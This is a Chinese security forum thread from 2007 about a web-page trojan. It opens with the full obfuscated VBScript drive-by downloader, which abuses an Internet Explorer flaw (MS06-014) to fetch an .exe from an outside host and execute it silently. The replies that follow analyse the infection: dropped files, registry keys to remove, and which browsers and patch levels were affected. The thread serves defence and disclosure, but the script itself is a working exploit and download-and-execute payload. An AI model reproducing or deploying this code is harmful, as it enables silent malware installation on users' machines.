瑞星卡卡安全论坛

<script language="VBScript">
on error resume next
tc = "http://www.ahwlqy.com/123.exe"
k1="c"&"l"
k2="s"&"i"&"d:"
c1=k1&k2
b1="o"&"b"&"j"
b2="e"&"c"&"t"
m1=b1&b2
m2="c"&"l"&"a"&"s"&"s"&"i"&"d"
m3=c1&"B"&"D"&"9"&"6"&"C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&"3"&"6"
m4="M"&"i"&"c"&"r"&"o"&"s"&"o"&"f"&"t"&"."&"X"&"M"&"L"&"H"&"T"&"T"&"P"
m5="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"&"t"&"i"&"o"&"n"
m6="S"&"c"&"r"&"i"&"p"&"t"&"i"&"n"&"g"&"."&"F"&"i"&"l"&"e"&"S"&"y"&"s"&"t"&"e"&"m"&"O"&"b"&"j"&"e"&"c"&"t"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="o"&"p"&"e"&"n"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="A"&"d"&"o"
a2="d"&"b"&"."
a3="S"&"t"&"r"
a4="e"&"a"&"m"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="G"&"E"&"T"
Xd.Open Xh, tc, False
Xd.Send
X9="tcsafe.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
sub tcsafe2exe(Xe,X9)
X9= Xb.BuildPath(Xe,X9)
end sub
Xa.open
X8="X"&"a"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"a"&"t"&"h(Xa,X8)"
X7="Xb.B"&"ui"&"ld"&"Pa"&"th(Xb,X7)"
X6="Xc.B"&"u"&"il"&"dP"&"at"&"h(Xd,X6)"
X5="X"&"d.Bu"&"il"&"dP"&"a"&"t"&"h(Xf,X5)"
X4="Xe.B"&"ui"&"ld"&"Pa"&"t"&"h(Xg,X4)"
X3="X"&"f.Bu"&"il"&"d"&"Pa"&"t"&"h(Xh,X4)"
X2="Xg.B"&"ui"&"l"&"d"&"Pa"&"t"&"h(Xi,X3)"
X1="Xh.B"&"u"&"i"&"ld"&"Pa"&"t"&"h(Xg,X1)"
z0="Xi.B"&"u"&"i"&"ld"&"P"&"a"&"th(Xk,X0)"
X0=z0
call tcsafe2exe(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
<script language="JavaScript" charset="gb2312" type="text/javascript" src="http://www8.itsun.com/count.php?uuid=1712118&style=text&textcolor=black"></script>

【回复“纳兰明珠”的帖子】
http://www.ahwlqy.com/123.exe——————木马
下载运行后释放两个文件（图1），那个jmp插入explorer进程。强制卸除explorer进程中的jmp后，两个木马文件可直接删除。
需要删除的注册表项见图2。还有HKCR\CLSID\{754FB7D8-B8FE-4810-B363-A788CD060F1F}也要删除。
图1

附件: 155847200731591556.jpg

图2

附件: 155847200731591641.jpg

为什么SSM没任何提示呢？
我看看。。。

引用:

【纳兰明珠的贴子】为什么SSM没任何提示呢？ 我看看。。。 ………………

附件: 155847200731594152.jpg

不是呀，，我是说打开网页没有提示任何东西。。。。

引用:

【纳兰明珠的贴子】不是呀，，我是说打开网页没有提示任何东西。。。。 ………………

没新程序运行，SSM提示啥？

无提示，打开网页，空的，什么都没提示，也没发现下载或运行了什么程序。。。不敢关机了：（

引用:

【纳兰明珠的贴子】无提示，打开网页，空的，什么都没提示，也没发现下载或运行了什么程序。。。不敢关机了：（ ………………

那个网址？

ャo乖 ︶~*乖()  (2007-03-14 21:41:37)
> www.ahwlqb.com/123.html这里有我的照片大家来看下顺便给个评价谢谢了  -./>>

然后我本着对SSM无比的信任跑进去看了。。。

偶的BIT拦截了

还没有轮动SSM出场就。。。。

附件: 7348322007315110957.gif

我的SSM也没有任何提示!!

引用:

【纳兰明珠的贴子】然后我本着对SSM无比的信任跑进去看了。。。 ………………

1

附件: 1558472007315112714.jpg

2

附件: 1558472007315112733.jpg

3

附件: 1558472007315112800.jpg

4

附件: 1558472007315112824.jpg

5

附件: 1558472007315112922.jpg

jmp和sys文件被释放到哪个目录下了啊?

6

附件: 1558472007315112955.jpg

引用:

【o坤义o的贴子】jmp和sys文件被释放到哪个目录下了啊? ………………

C:\Program Files\Internet Explorer\PLUGINS

我访问 http://www.ahwlqb.com/123.html 后没任何反映,我用的是IE7.0+Tiny+SSM

引用:

【o坤义o的贴子】我访问 http://www.ahwlqb.com/123.html 后没任何反映,我用的是IE7.0+Tiny+SSM ………………

这类破东东，估计只有补丁不全的IE6.0以下的版本才能中。
用OPERA浏览器访问那个网址————也没事。

MS06-014

猫叔用的不是免费版的吧？

【回复“baohe”的帖子】

不可能，我的WIN2000PRO + IE 6  +BitDefender 10 PRO +SSM

我的系统一直打补丁，今天才把前几天的补丁打完了。可BIT就查出有毒来。我想恐怕不是补丁打不打的原因，只是打了补丁病毒补拦了一部分，还有一部分没有查出来

引用:

【newyn的贴子】【回复“baohe”的帖子】 不可能，我的WIN2000PRO + IE 6  +BitDefender 10 PRO +SSM 我的系统一直打补丁，今天才把前几天的补丁打完了。可BIT就查出有毒来。我想恐怕不是补丁打不打的原因，只是打了补丁病毒补拦了一部分，还有一部分没有查出来 ………………

1、21楼说：他用IE7.0浏览那个网页没问题。
2、我用OPERA浏览该网页————也没问题。
3、我用IE6.0（我的XPSP2系统及IE6.0的补丁只打到去年6月）浏览该网页，就能顺利将木马植入系统。
什么问题？自己想吧。

【回复“baohe”的帖子】

那如果你的观点成立的话，那该杀软件也不会报毒出来才怪，可是确确实实有了


BIT先报。SSM没动静。]


杀软查出来。说明系统的确还是有中毒的危险。也就是说，补丁并不能做为防御该毒的“墙”。

附件: 7348322007315144834.gif

引用:

【newyn的贴子】【回复“baohe”的帖子】 那如果你的观点成立的话，那该杀软件也不会报毒出来才怪，可是确确实实有了 BIT先报。SSM没动静。] 杀软查出来。说明系统的确还是有中毒的危险。也就是说，补丁并不能做为防御该毒的“墙”。 ………………

SSM没动静？是你的SSM没动静吧？看13楼的图。

【回复“baohe”的帖子】

偶也用SSM ，2.3.0.612版的。BIT防病毒日期2007-3-15 14:03:26
现在做了影子系统，除了杀软报外，SSM无反应，应该是BIT先报毒先拦截导致SSM没报，但和系统补丁不是致命关系（打了补丁应该机率小一点），并不是1。21楼说的无事。